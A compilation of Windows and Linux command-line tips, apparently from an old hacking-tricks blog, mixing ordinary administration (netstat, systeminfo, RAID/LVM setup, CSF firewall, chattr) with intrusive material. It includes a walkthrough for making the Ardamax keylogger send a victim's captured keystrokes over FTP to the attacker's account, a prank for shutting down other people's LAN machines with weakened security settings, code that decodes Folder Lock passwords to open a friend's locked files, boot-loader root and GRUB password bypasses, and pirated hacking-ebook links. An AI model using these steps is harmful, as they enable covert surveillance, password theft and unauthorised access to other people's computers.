dir *.pdf /s /b > files.txt

Get Your IP Address Information

ipconfig /all

This will retrieve a pile of information about your network connection and IP information. From this command, you can get:

Host Name
Primary DNS Suffix
Node Type
IP Routing Enabled
WINS Proxy Enabled
DNS Suffix Search List
Connection-specific DNS Suffix
Network Adapter Description
Physical (MAC) Address
DHCP Enabled
IP Address
Subnet Mask
Default Gateway
DNS Servers

Get Installed Driver Information

driverquery

It can be very useful when troubleshooting to know what drivers are installed on a system. This command will give you a complete listing of the drivers and when they were installed.
Copy Files Via Infrared Port

irftp filename.ext

This will fire up the Wireless Link dialog so that you can copy the specified file via an infrared port.
Find Files Opened By Network Users

openfiles /query

If you are running a system and want to know who has files open on your computer, this command will give you a list of those users and the files they have open.

Note: If you get an error saying The system global flag ‘maintain objects list’ needs to be enabled to see local opened files, you can fix this issue by typing openfiles /local on. You will have to reboot the system but it will resolve the issue.

Monitor Port Activity

netstat -a 30

This will show you all of the TCP/IP ports in use on your system and what they are connected to (or being connected from). It will keep monitoring these ports and refresh the information every 30 seconds. You can change the refresh rate by changing the number at the end of the command.
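Added example, not from the original page: a Python parser for the netstat -a listing described here that pulls out the ports in the LISTENING state and the TCP sockets talking to hosts outside loopback and RFC 1918 space, which is what a defender reviewing the listing actually wants from it. The netstat text is a constructed sample using documentation addresses.

```python
import ipaddress
import re

# Constructed sample of Windows "netstat -a" output (documentation addresses).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.20:1034      192.168.1.5:445        ESTABLISHED
  TCP    192.168.1.20:1051      203.0.113.7:21         ESTABLISHED
  TCP    192.168.1.20:1052      198.51.100.9:6667      SYN_SENT
  UDP    0.0.0.0:137            *:*
"""

# Proto, local host:port, foreign host:port, optional state (UDP rows have none).
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+(\S+))?\s*$")

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(host):
    """Wildcard, unspecified, loopback or RFC 1918 addresses count as internal."""
    if host in ("*", "0.0.0.0", "[::]"):
        return True
    try:
        addr = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False                      # a hostname; treat as external, i.e. worth a look
    return addr.is_loopback or any(addr in net for net in RFC1918)


def parse_netstat(text):
    """Parse the listing into rows: {proto, local, foreign, state}."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue                      # header and blank lines
        proto, lhost, lport, fhost, fport, state = m.groups()
        rows.append({"proto": proto, "local": (lhost, lport),
                     "foreign": (fhost, fport), "state": state or ""})
    return rows


def listening_ports(text):
    """TCP ports something on this machine is waiting for connections on."""
    return sorted({int(r["local"][1]) for r in parse_netstat(text) if r["state"] == "LISTENING"})


def external_connections(text):
    """TCP sockets bound for hosts outside loopback/RFC 1918 space: (host, port, state)."""
    return [(r["foreign"][0], int(r["foreign"][1]), r["state"])
            for r in parse_netstat(text)
            if r["proto"] == "TCP" and not is_internal(r["foreign"][0])]


if __name__ == "__main__":
    print("listening:", listening_ports(SAMPLE_NETSTAT))
    print("external:", external_connections(SAMPLE_NETSTAT))
```

Since netstat -a 30 re-prints the listing every 30 seconds, feeding each listing through external_connections() and diffing the results shows new outbound sessions as they appear; adding the -o switch to netstat prints the owning process id in an extra column, which tells you which program opened each one.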


Recover Information From A Corrupt File

recover filename.ext

If you have a disk with damaged sectors, you can attempt to recover as much information as possible from a damaged file. Data in undamaged sectors can be retrieved, but data in damaged sectors will be lost.
Defragment Remote Computer

rexec remotePC defrag C: /F

This uses the rexec command to force a defragment of the C: drive on the computer named remotePC. You can use whatever command you want (I just used defrag C: /F as an example). This is very useful for remote maintenance.
Retrieve Detailed System Information

systeminfo

With this command, you can retrieve the following information:

Host Name
OS Name
OS Version
OS Manufacturer
OS Configuration
OS Build Type
Registered Owner
Registered Organization
Product ID
Original Install Date
System Up Time
System Manufacturer
System Model
System type
Processor(s)
BIOS Version
Windows Directory
System Directory
Boot Device
System Locale
Input Locale
Time Zone
Total Physical Memory
Available Physical Memory
Virtual Memory Max Size
Virtual Memory Available
Virtual Memory In Use
Page File Location(s)
Domain
Logon Server
Hotfix(s)
Network Card(s)

Automatically Defragment C: Daily

schtasks /create /tn "Defrag C" /tr "defrag c: /f" /sc daily /st 23:00:00 /ru "System"

This will set your computer to automatically perform a complete defrag of the C: drive each day at 11:00:00 PM (23:00:00). It does this by creating a scheduled task called Defrag C. It will run this command under the computer’s system account.
Map A Drive Letter to a Folder

subst W: C:\windows

Sometimes, your directory structure can get pretty deep and complicated. You can simplify this a bit by mapping a drive letter to commonly used folders. In the example that I have given, this will create a drive letter W: and map it to the C:\windows directory. Then, whenever you go into My Computer, you will see a W: drive and when you browse to it, it will automatically take you to the contents of the C:\windows folder.

You can do this with any unused drive letter and any folder that exists on your system.
List All Tasks Running On The Computer

tasklist

It's always good to know what is running on your system. This is the command line version of the Processes tab in Task Manager.
Kill A Program

taskkill /im programname.exe /f

If, when using the tasklist command, you discover something running that you just want killed, this is the way to do it! Just note the program name and use it in place of programname.exe.
Reboot a Remote Computer

shutdown -r -f -m \\remotePC -c "System will be rebooted in 20 seconds"

Sometimes, you just need to reboot a system. This will do it remotely and give the user a 20 second warning.
CHAT WITH COMMAND PROMPT
If you want a private chat with a friend or client on your network, you don't need to download any fancy program!
All you need is your friend's IP address and Command Prompt.

Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:

Message:

Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Hi friends, if you are getting confused,
I'll explain to you how to do it!
open notepad
type this

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

now click on file
click on save as
and then give it the name messenger.bat
click save

now go to Control Panel
click on Administrative Tools (switch to classic view)
then click on Services
then find the Messenger service
open it
you'll see the Startup type, which would be Disabled
so click on that and select Manual
now press the Start button and Apply

now do the same on the remote computer;
until this service is activated on that PC, you won't be able to use this

now click on that file you made
type the ip
type the message
and enter

there you go!

SHUT DOWN ANY PC ON YOUR LAN USING COMMAND PROMPT

This trick will shut down a selected PC on your LAN. You can apply this trick in your office or school, but I take no responsibility for any action. It's just for fun. Here is how to use this trick:

1. Go to Start > Run and type in cmd

2. You will see the command prompt window . Now type in this command line.

shutdown.exe -i

And hit Enter. You will see the Remote Shutdown window. If you know the IP of someone's computer in your Local Area Network, type in their IP address after clicking the Add button.

3. After entering the IP address click OK. Now watch the person's face as their computer shuts down.

Some friends have told me that they got an Access Denied error for the remote shutdown. Add the user with the privilege to force a remote shutdown on the computer you are about to shut down. To do this go to Control Panel > Administrative Tools > Local Security Settings. Now go to Security Settings > Local Policies > User Rights Assignment. Double-click on Force shutdown from a remote system in the right pane and click on Add User or Group. Add the computer that runs the remote shutdown command.


Or you can do this on the computer you are about to shut down:
a) Go to Start > Run, type Regedit in the dialog box and hit Enter
b) Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
c) Find "forceguest" in the right pane, double-click it to modify the entry, and change the value from "1" to "0"

how to use a key logger

Receiving logs of a keylogger-infected computer via FTP
Requirements :
1) Ardamax Keylogger
2) An Account on drivehq ( Make one its free )

Procedure

1) Create an account on drivehq.com; it's easy to make an account and it's all free.


2) Log in to your drivehq account and click on New Folder as shown in the picture.


3) Right-click on the icon of Ardamax Keylogger at the bottom right of the taskbar and click on Options.


4) Now click on the Delivery option, which has an FTP feature, and enter the information as shown in the picture, where you give your path on DriveHQ.

PS: enter the login and password of the drivehq.com account you just made.

Once you have entered all the credentials properly, click on Test to check whether the connection is established successfully or not.


5) Then go to Control to do the log settings for how you want the logs to come; here you have to click on the delivery method and select FTP so that the logs are sent by FTP.


6) Click OK and Ardamax will minimize.

VOILA, ALL THE LOGS WILL GO DIRECTLY TO THE drivehq account you made, using FTP. Cheers, have fun.

comments appreciated

Anti Keylogger Shield

Anti Keylogger Shield is an easy to use anti-spy tool that blocks the operation of keyloggers, known or unknown, commercial or custom made. Once installed it runs silently in the system tray, blocks the system mechanisms that keyloggers use to capture keystrokes, and starts protecting your privacy immediately. With Anti Keylogger Shield you can hide and protect your keystrokes from prying eyes.

Keep your keystrokes PRIVATE!

Keyloggers are small spy programs that record everything you type on the computer, including documents, emails, user names and passwords, and then either store this information in a hidden place on your computer or send it over the Internet to the person who planted it.
Keyloggers arrive in many forms: as email attachments, viruses or Trojan horses, from people who want to invade your privacy and see what you are typing, or from remote attackers who want to steal user names and passwords as you type them.

Hack "folder lock" password

Folder Lock is one of many folder-protection programs. Today we are going to recover the Folder Lock password: not reset it, but read it.

This is how it works.

Open REGEDIT from the Run command and go to the following path:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl]
"_pack"="this is the obfuscated password ~~~"

Ignore the trailing ~~~~ characters; they are padding. For example espxttbqfwpm~~~~~ becomes "espxttbqfwpm". Then REVERSE the string: "espxttbqfwpm" becomes "mpwfqbttxpse" (take the last character, put it first, and repeat until the whole string is reversed).

Next, move every character one step back in the alphabet:
m becomes l, because l is the letter before m;
p becomes o, because o is the letter before p;
and so on until the whole string is readable. In this example espxttbqfwpm, after decoding, becomes lovepassword.

So the stored value is not encrypted at all: it is the password reversed, with each letter shifted forward by one, plus padding. Anyone who can read the HKEY_CURRENT_USER hive of the user who set the password can recover it.

Easy, right? Why not try it yourself and find the secret files locked on a friend's computer or laptop.

PS: I have not tested this yet (as usual) because I have a lot to do. I found this trick on an Indonesian forum in Bahasa and translated it myself without losing the idea; sorry for my bad English.
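The decoding described above, written out as an added example (this is not code from the original post and not Folder Lock's own code). It strips the "~" padding, reverses the string and shifts each character back by one; the encoder is the inverse so the round trip can be checked. The sample registry value is the one quoted in the post; handling of upper-case letters and digits (wrapping within their own range) is my assumption, since the post only shows lower-case letters.

```python
"""Decode / encode the obfuscated Folder Lock "_pack" registry value."""


def _shift(text, delta):
    # Shift letters and digits within their own range (assumption: the post
    # only shows lower-case letters, the wrap-around for other classes is mine).
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            base, span = ord("a"), 26
        elif "A" <= ch <= "Z":
            base, span = ord("A"), 26
        elif "0" <= ch <= "9":
            base, span = ord("0"), 10
        else:
            out.append(ch)          # anything else passes through unchanged
            continue
        out.append(chr(base + (ord(ch) - base + delta) % span))
    return "".join(out)


def decode_folder_lock(value):
    """Registry `_pack` value -> cleartext password.

    Steps from the post: drop trailing '~' padding, reverse, shift back by one.
    """
    return _shift(value.rstrip("~")[::-1], -1)


def encode_folder_lock(password, pad_to=0):
    """Cleartext -> `_pack` value (inverse of decode), optionally '~'-padded."""
    packed = _shift(password, +1)[::-1]
    return packed + "~" * max(0, pad_to - len(packed))


if __name__ == "__main__":
    sample = "espxttbqfwpm~~~~~"          # value shown in the post
    print(decode_folder_lock(sample))     # lovepassword
```

Because the transform is a fixed permutation with no key, the same code reads every Folder Lock password on a machine; that is the practical meaning of "obfuscation, not encryption".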

Download Ebooks......!

All the archives below are protected with the same password: rocks

bluetooth_hacking.zip (3.32 MB)
Download :- http://www.fileserve.com/file/VYynet2

Hardware.Hacking.Projects.for.Around.Home.zip (5.80 MB)
Download :- http://www.fileserve.com/file/2sEQsZD

4367dorks.zip (101.95 KB)
Download :- http://www.fileserve.com/file/Cg9aQn5

Black Book.zip (3.97 MB)
Download :- http://www.fileserve.com/file/QUcx2V3

Bufferoverflow-hackaholic.zip (590.52 KB)
Download :- http://www.fileserve.com/file/UKnhjgP

Encryption Algorithms Explained.zip (166.01 KB)
Download :- http://www.fileserve.com/file/Drcgz9h

Google as a hacking tool.zip (299.99 KB)
Download :- http://www.fileserve.com/file/VXHJdfB

GPS hacking.zip (8.63 MB)
Download :- http://www.fileserve.com/file/Zfmwy7G

Hacking BlackBerry.zip (4.04 MB)
Download :- http://www.fileserve.com/file/ARgxx9f

Hacking Firefox.zip (10.85 MB)
Download :- http://www.fileserve.com/file/956UQNf

Hacking Hand Book.zip (125.44 KB)
Download :- http://www.fileserve.com/file/fEc5bea

Hacking VOIP.zip (16.41 MB)
Download :- http://www.fileserve.com/file/VynzGqQ

Hacking.The.Next.Generation.Sep.2009_ddlworld.info.zip (6.89 MB)
Download :- http://www.fileserve.com/file/FpCaaxd

Hacking_Wireless_Networks_For_Dummies.zip (8.00 MB)
Download :- http://www.fileserve.com/file/92ncV8c

McGraw_Hill_Gray_Hat_Hacking_2nd.zip (8.50 MB)
Download :- http://www.fileserve.com/file/pMFPvXX

The_Google_Hackers_Guide.zip (677.97 KB)
Download :- http://www.fileserve.com/file/QAThHFA

Transparent_proxies_with_Squid_Proxy_Servers.zip (86.27 KB)
Download :- http://www.fileserve.com/file/gM7farD

Untold Windows Tips And Secrets.zip (181.00 KB)
Download :- http://www.fileserve.com/file/5XEP8y2

FOLDER LOCK without any Software

This batch file hides a folder by renaming it to a Control Panel CLSID and setting the hidden and system attributes. It is obscurity, not security: the password sits in plain text inside the .bat, and anyone can run attrib -s -h on the renamed folder or open it from the command line. Use it to keep files out of casual view, not to protect anything sensitive.

* Copy the following code:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder (Y/N)?
set /p "cho=>"
if /i "%cho%"=="Y" goto LOCK
if /i "%cho%"=="N" goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto END
:UNLOCK
echo Enter password to unlock folder
set /p "pass=>"
if NOT "%pass%"=="type your password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder unlocked successfully
goto END
:FAIL
echo Invalid password
goto END
:MDLOCKER
md Locker
echo Locker created successfully
goto END
:END

* Paste it into Notepad.
* Replace "type your password here" with your password. Both sides of the comparison are quoted, so a password containing spaces no longer breaks the script (an unquoted comparison would); batch labels are not case sensitive, so END and End are the same label.
* Save it as a batch file (extension .bat). Any name will do.
* Double-click the batch file once: it creates a folder named Locker in the same location.
* Move the files you want to hide into the Locker folder.
* Double-click the batch file again and answer Y to lock (hide) the folder.
* To get your files back, double-click the batch file again; you will be prompted for the password. Enter it and the Locker folder reappears.

Linux Firewall

Hi,

If you run a Linux server and want added security, installing a host firewall is important.

CSF (ConfigServer Security & Firewall) and APF (Advanced Policy Firewall) are long-established front ends to iptables for Linux. At the same time, they are easy to install and use.

Tutorial:
Code:
wget http://www.configserver.com/free/csf.tgz
tar zxf csf.tgz
cd csf
sh install.sh

Once installed, use the following options:
Code:
csf -s    # starts the firewall
csf -r    # restarts the firewall
csf -f    # flushes (stops) the firewall rules

For configuration options, edit /etc/csf/csf.conf. Two settings matter right away. TESTING = "1" is the default: it installs a cron job that flushes the rules every few minutes so that a mistake cannot lock you out, but it also means the firewall is not really enforcing anything. Make sure your SSH port is listed in TCP_IN, then set TESTING = "0" and restart with csf -r.

Linux Hacking Password Cracking Steps...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Resetting the root password from the boot loader (GRUB legacy, as on CentOS / RHEL 5):

Step 1: Start the machine and press the down arrow key at the boot menu to stop the timeout.

Step 2: With the GRUB menu in front of you press 'e'. You see three lines; press the down arrow to go to the second line (the kernel line) and press 'e' again.

Step 3: Don't change anything else: press the space bar, type '1' (or 'single') at the end of the line, press Enter, then press 'b' to boot.

Step 4: You drop into a root shell without being asked for a password. Type 'passwd root' to change the root password.

Step 5: After that type 'exit' and the system continues booting normally.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to set the GRUB loader password
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Anyone with physical access can do the above, so secure the boot loader by setting a GRUB password, either at installation time or afterwards with the following steps.

Step 1: Run grub-md5-crypt and enter the password you want to set. It prints an MD5-crypt hash of the form $1$...$...

Step 2: Copy the generated hash into a line of the form: password --md5 <hash>

Step 3: Open grub.conf with: vim /boot/grub/grub.conf
and paste that line just after the timeout line (before the first title entry).

Step 4: Save and exit. From now on GRUB asks for the password before it lets anyone edit a boot entry.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
How to remove the GRUB loader password
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Step 1: Insert the operating system disc and boot from it. I am assuming you are performing these steps on CentOS.

Step 2: At the boot prompt type 'linux rescue'.

Step 3: Once anaconda starts the rescue environment it offers to mount the installed system under /mnt/sysimage; accept, and you get a bash shell.

Step 4: Type 'chroot /mnt/sysimage'

Step 5: Open grub.conf with: vim /boot/grub/grub.conf

Step 6: Remove the password line, save and exit, then exit the chroot and exit the shell. The system reboots and next time GRUB will not ask for the password.

Because a rescue disc bypasses the GRUB password entirely, the password only helps if the BIOS is set to boot from the hard disk first, the BIOS setup itself has a password, and the machine is physically secured.

Get a free Linux CD delivered to your home

Visit the following website and get an Ubuntu CD delivered to your home for free:

https://shipit.ubuntu.com/

Managing RAID and LVM with Linux (v0.5)

I hope to turn this into a general, easy to follow guide to setting up RAID-5 and LVM on a modern Linux system. For now, however, it is basically a collection of my notes as I experimented on my own systems. Please note that my experimentation was based on the RAID and LVM implementations under Fedora Core 3 & 4, as well as Red Hat Enterprise Linux 4, all of which are based on the 2.6 series of kernels. These instructions may or may not work with other versions or distros. I'm not an expert (yet) in either software RAID or LVM, so please use the comment section below for corrections and comments.

* What is RAID and LVM
* Initial setup of a RAID-5 array
* Initial setup of LVM on top of RAID
* Handling a Drive Failure
* Common Glitches
* Other Useful Resources
* Expanding an Array/Filesytem

What is RAID and LVM
RAID is usually expanded as Redundant Array of Inexpensive (or Independent) Disks. It is normally used to spread data among several physical hard drives with enough redundancy that, should any drive fail, the data will still be intact. Once created, a RAID array appears to be one device which can be used pretty much like a regular partition. There are several kinds of RAID but I will only refer to the two most common here.

The first is RAID-1, also known as mirroring. RAID-1 is basically done with two essentially identical drives, each holding a complete copy of the data. The second, the one I will mostly refer to in this guide, is RAID-5, which is set up using three or more drives with the data and parity spread so that any one drive failing will not result in data loss. The Red Hat website has a great overview of the RAID levels.

There is one limitation with Linux software RAID: a /boot partition can only reside on a RAID-1 array, because the boot loader reads the partition as an ordinary filesystem and only a RAID-1 member is a complete copy on its own.

Linux supports several hardware RAID controllers, but also software RAID, which allows you to use any IDE or SCSI drives as the physical devices. In all cases I'll refer to software RAID.

LVM stands for Logical Volume Manager and is a way of grouping drives and/or partitions so that, instead of dealing with hard and fast physical partitions, the data is managed on a virtual basis where the virtual partitions can be resized. The Red Hat website has a great overview of the Logical Volume Manager.

There is one limitation: LVM cannot be used for /boot (GRUB legacy cannot read a logical volume).
Initial setup of a RAID-5 array
I recommend you experiment with setting up and managing RAID and LVM before using them on an important filesystem. One way I was able to do it was to take an old hard drive and create a bunch of partitions on it (8 or so should be enough) and try combining them into RAID arrays. In my testing I created two RAID-5 arrays, each with 3 partitions. You can then manually fail and hot-remove the partitions from the array and then add them back to see how the recovery process works. You'll get a warning about the partitions sharing a physical disk but you can ignore that since it's only for experimentation.

In my case I have two systems with RAID arrays, one with two 73G SCSI drives running RAID-1 (mirroring) and my other test system is configured with three 120G IDE drives running RAID-5. In most cases I will refer to my RAID-5 configuration as that will be more typical.

I have an extra IDE controller in my system to allow me to support the use of more than 4 IDE devices which caused a very odd drive assignment. The order doesn't seem to bother the Linux kernel so it doesn't bother me. My basic configuration is as follows:

hda 120G drive
hdb 120G drive
hde 60G boot drive not on RAID array
hdf 120G drive
hdg CD-ROM drive

The first step is to create the physical partitions on each drive that will be part of the RAID array. In my case I want to use each 120G drive in the array in it's entirety. All the drives are partitioned identically so for example, this is how hda is partitioned:

Disk /dev/hda: 120.0 GB, 120034123776 bytes
16 heads, 63 sectors/track, 232581 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes

Device Boot Start End Blocks Id System
/dev/hda1 * 1 232581 117220792+ fd Linux raid autodetect

So now with all three drives with a partitioned with id fd Linux raid autodetect you can go ahead and combine the partitions into a RAID array:

# /sbin/mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 \
/dev/hdb1 /dev/hda1 /dev/hdf1

Wow, that was easy. That created a special device /dev/md0 which can be used instead of a physical partition. You can check on the status of that RAID array with the mdadm command:

# /sbin/mdadm --detail /dev/md0
Version : 00.90.01
Creation Time : Wed May 11 20:00:18 2005
Raid Level : raid5
Array Size : 234436352 (223.58 GiB 240.06 GB)
Device Size : 117218176 (111.79 GiB 120.03 GB)
Raid Devices : 3
Total Devices : 3
Preferred Minor : 0
Persistence : Superblock is persistent

Update Time : Fri Jun 10 04:13:11 2005
State : clean
Active Devices : 3
Working Devices : 3
Failed Devices : 0
Spare Devices : 0

Layout : left-symmetric
Chunk Size : 64K

UUID : 36161bdd:a9018a79:60e0757a:e27bb7ca
Events : 0.10670

Number Major Minor RaidDevice State
0 3 1 0 active sync /dev/hda1
1 3 65 1 active sync /dev/hdb1
2 33 65 2 active sync /dev/hdf1

The important line to check is State, which should say clean; otherwise there might be a problem. At the bottom, make sure the State column always says active sync, which means each device is actively in the array. You could also have a spare device on hand should any drive fail; if you have a spare you'll see it listed as such here.

One thing you'll notice above, if you're paying attention, is that the size of the array is 240G although there are three 120G drives in it. That is because in RAID-5 one drive's worth of capacity is consumed by the parity data needed to survive the failure of any one drive: usable space is (n - 1) times the size of the smallest member.
Initial setup of LVM on top of RAID
Now that we have the /dev/md0 device you can create a Logical Volume on top of it. Why would you want to do that? If I were to build an ext3 filesystem directly on top of the RAID device and someday wanted to increase its capacity, I wouldn't be able to do that without backing up the data, building a new RAID array and restoring my data. Using LVM allows me to expand (or contract) the size of the filesystem without disturbing the existing data.

Anyway, here are the steps to then add this RAID array to the LVM system. The first command pvcreate will "initialize a disk or partition for use by LVM". The second command vgcreate will then create the Volume Group, in my case I called it lvm-raid:

# pvcreate /dev/md0
# vgcreate lvm-raid /dev/md0

The default physical extent size can be too small for a large RAID array. In those cases specify the -s option with a larger than default physical extent size. The default is only 4MB as of the version in Fedora Core 5. With LVM1 metadata the maximum number of physical extents in a volume was approximately 65k (LVM2 has no such hard limit, but a larger extent size still keeps the metadata small), so take your maximum volume size and divide it by 65k, then round up to the next nice round number. For example, to create a 550G volume, figure that's approximately 550,000 megabytes, divide by 65,000 and you get roughly 8.46. Round up to the next nice round number and use 16M (16 megabytes) as the physical extent size:

# vgcreate -s 16M lvm-raid /dev/md0

Ok, you've created a blank receptacle but now you have to tell how many Physical Extents from the physical device (/dev/md0 in this case) will be allocated to this Volume Group. In my case I wanted all the data from /dev/md0 to be allocated to this Volume Group. If later I wanted to add additional space I would create a new RAID array and add that physical device to this Volume Group.

To find out how many PEs are available to me use the vgdisplay command to find out how many are available and now I can create a Logical Volume using all (or some) of the space in the Volume Group. In my case I call the Logical Volume lvm0.

# vgdisplay lvm-raid
.
.
Free PE / Size 57235 / 223.57 GB
# lvcreate -l 57235 lvm-raid -n lvm0

In the end you will have a device you can use very much like a plain old partition, called /dev/lvm-raid/lvm0. You can check the status of the Logical Volume with the lvdisplay command. The device can then be used to create a filesystem on.

# lvdisplay /dev/lvm-raid/lvm0
--- Logical volume ---
LV Name /dev/lvm-raid/lvm0
VG Name lvm-raid
LV UUID FFX673-dGlX-tsEL-6UXl-1hLs-6b3Y-rkO9O2
LV Write Access read/write
LV Status available
# open 1
LV Size 223.57 GB
Current LE 57235
Segments 1
Allocation inherit
Read ahead sectors 0
Block device 253:2
# mkfs.ext3 /dev/lvm-raid/lvm0
.
.
# mount /dev/lvm-raid/lvm0 /mnt
# df -h /mnt
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/lvm--raid-lvm0
224G 93M 224G 1% /mnt

Handling a Drive Failure
As everything eventually does break (some sooner than others) a drive in the array will fail. It is a very good idea to run smartd on all drives in your array (and probably ALL drives period) to be notified of a failure or a pending failure as soon as possible. You can also manually fail a partition, meaning to take it out of the RAID array, with the following command:

# /sbin/mdadm /dev/md0 -f /dev/hdb1
mdadm: set /dev/hdb1 faulty in /dev/md0

Once the system has determined that a drive has failed or is otherwise missing (you can shut down, pull out a drive and reboot to simulate a drive failure, or use the command above to manually fail a drive), mdadm will show something like this:

# /sbin/mdadm --detail /dev/md0
Update Time : Wed Jun 15 11:30:59 2005
State : clean, degraded
Active Devices : 2
Working Devices : 2
Failed Devices : 1
Spare Devices : 0
.
.
Number Major Minor RaidDevice State
0 3 1 0 active sync /dev/hda1
1 0 0 - removed
2 33 65 2 active sync /dev/hdf1

You'll notice that in this case I had /dev/hdb fail. I replaced it with a new drive of the same capacity and was able to add it back to the array. The first step is to partition the new drive just like when first creating the array. Then you can simply add the partition back to the array and watch the status as the data is rebuilt onto the newly replaced drive.

# /sbin/mdadm /dev/md0 -a /dev/hdb1
# /sbin/mdadm --detail /dev/md0
Update Time : Wed Jun 15 12:11:23 2005
State : clean, degraded, recovering
Active Devices : 2
Working Devices : 3
Failed Devices : 0
Spare Devices : 1

Layout : left-symmetric
Chunk Size : 64K

Rebuild Status : 2% complete
.
.

During the rebuild process the system performance may be somewhat impacted, but the data should remain intact.
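Since a degraded array is only noticed if someone looks, here is an added example (not part of the original guide and not mdadm's own code) of the check a monitoring script would run: it parses the text that mdadm --detail prints, like the listings above, and reports the array-level State, the Failed Devices count and every member whose State column is not "active sync" (a plain "spare" is fine). The two samples are constructed from the listings in this guide; a real monitor would feed it subprocess.run(["mdadm", "--detail", dev], capture_output=True, text=True).stdout and alert on a non-empty result.

```python
"""Parse `mdadm --detail` output and report whether an array needs attention."""
import re

# Constructed from the healthy listing in this guide.
HEALTHY = """\
/dev/md0:
        Version : 00.90.01
          State : clean
 Active Devices : 3
Working Devices : 3
 Failed Devices : 0
  Spare Devices : 0

    Number   Major   Minor   RaidDevice State
       0       3        1        0      active sync   /dev/hda1
       1       3       65        1      active sync   /dev/hdb1
       2      33       65        2      active sync   /dev/hdf1
"""

# Constructed from the listing after /dev/hdb1 was failed.
DEGRADED = """\
/dev/md0:
          State : clean, degraded
 Active Devices : 2
Working Devices : 2
 Failed Devices : 1
  Spare Devices : 0

    Number   Major   Minor   RaidDevice State
       0       3        1        0      active sync   /dev/hda1
       1       0        0        -      removed
       2      33       65        2      active sync   /dev/hdf1
"""

_HEADER_RE = re.compile(r"^(State|Failed Devices)\s*:\s*(.+)$")


def parse_mdadm_detail(text):
    """Return {'state': str or None, 'failed': int, 'members': [dict, ...]}."""
    info = {"state": None, "failed": 0, "members": []}
    in_table = False
    for line in text.splitlines():
        s = line.strip()
        if not in_table:
            m = _HEADER_RE.match(s)
            if m and m.group(1) == "State":
                info["state"] = m.group(2).strip()
            elif m:
                info["failed"] = int(m.group(2))
            elif s.startswith("Number") and "RaidDevice" in s:
                in_table = True            # member rows follow this header
            continue
        parts = s.split()
        # Member row: Number Major Minor RaidDevice State... [/dev/xxx]
        if len(parts) < 5 or not all(p.isdigit() for p in parts[:3]):
            continue
        dev = parts[-1] if parts[-1].startswith("/dev/") else None
        state = " ".join(parts[4:-1] if dev else parts[4:])
        info["members"].append({"slot": parts[3], "state": state, "dev": dev})
    return info


def array_problems(text):
    """Return human-readable problems for one listing; [] means healthy."""
    info = parse_mdadm_detail(text)
    problems = []
    if info["state"] is None:
        problems.append("no State line found")
    else:
        flags = [f.strip() for f in info["state"].split(",")]
        if any(f not in ("clean", "active") for f in flags):
            problems.append("array state is '%s'" % info["state"])
    if info["failed"]:
        problems.append("%d failed device(s)" % info["failed"])
    for m in info["members"]:
        if m["state"] not in ("active sync", "spare"):
            where = m["dev"] or ("slot " + m["slot"])
            problems.append("member %s is '%s'" % (where, m["state"]))
    return problems


if __name__ == "__main__":
    for name, sample in (("healthy", HEALTHY), ("degraded", DEGRADED)):
        print(name, array_problems(sample) or "OK")
```

Run from cron or a smartd-style hook, it turns "clean, degraded" and a "removed" member into an alert instead of something you find out about when the second drive dies.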
Expanding an Array/Filesystem

I'm told it's now possible to expand the size of a RAID array much as you could on a commercial array such as the NetApp. The link below describes the procedure. I have yet to try it but it looks promising:

Growing a RAID5 array - http://scotgate.org/?p=107

Protecting IMPORTANT files in Linux

Sometimes, by mistake, you (as root) delete an important file from your Linux machine. It can be a ".conf" file for an important server or any other file that matters to you.

As root you have the right to do whatever you wish on the system. That is indeed a good thing and a blessing, but sometimes this EXTRA power is dangerous. Imagine typing
PHP Code:
rm -rf /etc/mail/
which deletes all your mail server configuration files.

There is a small HACK (hack meaning a clever trick) to make your important files IMMUTABLE, so that even root cannot remove them accidentally.

The command "chattr" sets file attributes on ext2/ext3/ext4 (and some other) filesystems, and one of those attributes protects a file against accidental removal.

The syntax is:
PHP Code:
chattr +i filename

i means: a file with the 'i' (immutable) attribute cannot be modified. It cannot be deleted or renamed, no hard link can be created to it, and no data can be written to it, not even by root. You can list a file's attributes with lsattr filename.

So your important files are protected against accidental removal and data manipulation. Here is an example:

